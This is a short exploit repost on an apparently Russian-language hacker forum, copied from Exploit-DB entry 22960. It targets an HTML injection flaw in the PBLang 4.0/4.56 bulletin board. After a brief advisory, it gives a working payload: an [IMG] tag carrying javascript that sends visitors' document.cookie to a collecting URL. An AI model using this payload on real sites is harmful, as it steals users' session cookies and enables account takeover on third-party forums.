Exploit PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22960
Проверка EDB
  1. Пройдено
Автор
QUAN VAN TRUONG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2003-07-28
Код:
source: https://www.securityfocus.com/bid/8286/info

PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags, when posting to the bulletin board. Attacker supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang.

[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")[/IMG]
 
Источник
www.exploit-db.com

Похожие темы